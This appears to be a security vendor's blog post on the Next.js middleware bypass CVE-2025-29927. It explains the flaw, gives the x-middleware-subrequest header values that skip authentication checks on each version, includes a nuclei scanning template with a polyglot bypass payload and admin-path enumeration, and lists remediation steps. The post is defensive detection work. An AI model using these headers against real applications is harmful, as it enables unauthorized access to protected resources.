Introduction
On March 21, 2025, a critical vulnerability in Next.js was disclosed as CVE-2025-29927, affecting versions 11.1.4 through 15.2.2. This vulnerability allows attackers to bypass middleware security controls by manipulating the x-middleware-subrequest
header, potentially leading to authentication bypasses and unauthorized access to protected resources.
At NightVision, our security research team has developed a nuclei template for detecting this vulnerability using directory bruteforcing to find protected endpoints. In this post, we'll analyze the vulnerability, explain detection challenges, and demonstrate how our template works.
Understanding the Vulnerability
Next.js middleware functions as an interceptor that executes before a request reaches its destination. It's commonly used to implement:
- Authentication checks
- Authorization controls
- Path rewrites and redirects
- Security header injections
The vulnerability exists in Next.js's internal mechanism designed to prevent infinite middleware recursion loops. By manipulating the x-middleware-subrequest
header, attackers can trick the middleware into thinking it's been processed already, causing it to skip crucial security checks.
Exploit Mechanics
The exploit works differently depending on the Next.js version:
- Pre-v12.2: Add the header
x-middleware-subrequest: pages/_middleware
- Modern versions: Add
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
- With src directory: Use
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
When successful, the vulnerability allows attackers to:
- Bypass authentication requirements
- Access protected routes and resources
- Circumvent security header protections (like CSP)
- Potentially trigger cache poisoning in specific configurations
Limitations of Existing Detection Methods
Based on our research and analysis of other Nuclei templates being considered in the Nuclei OSS community and publicly available information [2,3], we identified several limitations for CVE-2025-29927:
- Incomplete exploitation techniques: Many early PoCs incorrectly suggested that
x-middleware-subrequest: true
was sufficient for exploitation - Limited path discovery: Existing detection methods primarily rely on parsing HTML links, which typically won't include protected/admin routes
- Ineffective header detection: Some solutions don't properly check for the middleware-specific headers that indicate vulnerability
- Missing the X-Nextjs-Data header: Many detection methods don't use the
X-Nextjs-Data: 1
header which helps identify middleware usage
Our Detection Approach
Our nuclei template uses two main techniques to address these limitations:
1. Directory Bruteforcing for Path Discovery
To find potentially vulnerable endpoints, our template tests a list of common administrative and protected routes:
- Path enumeration: We test a curated list of common paths. This approach helps discover protected resources that aren't linked from public pages. Included paths:
- Administrative paths (admin, dashboard, administrator)
- Application-specific areas (account, user, config)
- Security-sensitive locations (security, system, backup)
- API endpoints and documentation areas
- Efficient testing flow: The template optimizes the scanning process by:
- First checking if middleware is in use
- Only proceeding with exploitation attempts on endpoints that show middleware activity
- This reduces scan time and server load
- Status code validation: The template checks response status codes to:
- Identify middleware-controlled redirects (307 responses)
- Detect successful bypass attempts (200 responses after exploitation)
2. Two-Stage Detection Process
Our template implements a two-stage process:
- Initial Middleware Detection: We identify if the application uses middleware by sending a request with the
X-Nextjs-Data: 1
header and checking for specific response headers. - Vulnerability Testing: For endpoints that show middleware activity, we attempt exploitation with a polyglot payload that works across all vulnerable Next.js versions.
This approach reduces false positives and improves efficiency by focusing only on potentially vulnerable endpoints.
The Nuclei Template
Here's the complete nuclei template we've developed:
id: CVE-2025-29927
info:
name: Next.js Middleware Bypass Detection
author: nvsecurity
severity: critical
description: |
Next.js contains a critical vulnerability affecting versions 11.1.4 through 15.2.2.
The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
'x-middleware-subrequest' header, which can lead to authorization bypass and other security control circumvention.
This template uses directory bruteforcing to discover protected endpoints that might be vulnerable
to this attack. It implements a two-stage approach that first identifies middleware usage
and then attempts exploitation.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/
remediation: |
Upgrade to Next.js 14.2.25 or 15.2.3 or later.
If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cwe-id: CWE-287
metadata:
max-request: 2
shodan-query: x-middleware-rewrite
fofa-query: x-middleware-rewrite
product: next.js
vendor: zeit
tags: cve,cve2025,nextjs,middleware,auth-bypass,nightvision
flow: |
const paths = [
"",
"admin",
"dashboard",
"administrator",
"account",
"next-admin",
"admin/dashboard",
"user",
"test",
"user/dashboard"
]
for (let path of iterate(paths)) {
set("path", path);
http(1) && http(2);
}
http:
- method: GET
path:
- "{{BaseURL}}/{{path}}"
headers:
X-Nextjs-Data: 1
matchers:
- type: dsl
dsl:
- contains_any(to_lower(header), 'x-nextjs-redirect', 'x-middleware-rewrite', 'x-nextjs-rewrite', 'x-middleware-next') && status_code == 307
internal: true
- method: GET
path:
- "{{BaseURL}}/{{path}}"
headers:
X-Middleware-Subrequest: "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"
matchers:
- type: dsl
dsl:
- status_code == 200
Benefits of This Approach
This template offers several practical benefits:
- Better path discovery: By testing common protected paths, the template can find endpoints that other methods might miss.
- Reduced false positives: The two-stage approach ensures we only test applications that actually use middleware.
- Version compatibility: The payload works across all vulnerable Next.js versions.
- Efficient scanning: The template optimizes scanning performance by only attempting exploitation on endpoints that show middleware activity.
Testing Results
When testing this template on web applications, we observed:
- Effective detection: The template successfully detected vulnerable endpoints on multiple Next.js applications.
- Reduced false alarms: The two-stage approach significantly reduced false positives compared to single-stage methods.
- Comprehensive coverage: The template worked consistently across different Next.js versions and configurations.
Mitigation and Remediation
If you identify vulnerable Next.js applications in your environment:
- Update immediately:
- Next.js 12.x: Update to ≥ 12.3.5
- Next.js 13.x: Update to ≥ 13.5.9
- Next.js 14.x: Update to ≥ 14.2.25
- Next.js 15.x: Update to ≥ 15.2.3
- If immediate updates aren't possible:
- Block the
x-middleware-subrequest
header at your WAF or reverse proxy - For Nginx:
proxy_set_header x-middleware-subrequest "";
- For Apache:
RequestHeader unset x-middleware-subrequest
- Block the
- Implement defense-in-depth:
- Add secondary authentication checks within API endpoints
- Consider implementing additional API gateway controls
Conclusion
The Next.js middleware bypass vulnerability (CVE-2025-29927) represents a significant risk for organizations using this popular framework. Our nuclei template provides a practical way to identify vulnerable applications by combining directory bruteforcing with a two-stage detection process.
At NightVision, we provide tools like this template to help our customers identify security vulnerabilities in their web applications. This template is now available through the NightVision platform.
For more information on how NightVision can help secure your web applications against vulnerabilities like CVE-2025-29927, visit nightvision.net or contact our security team.
References
- ZeroPath: Next.js Middleware Exploit: CVE-2025-29927 Authorization Bypass
- Assetnote: Doing the Due Diligence: Analyzing the Next.js Middleware Bypass
- Original Research by Zhero: Next.js and the Corrupt Middleware
- GitHub Security Advisory GHSA-f82v-jwr5-mffw
Schedule a NightVision Demo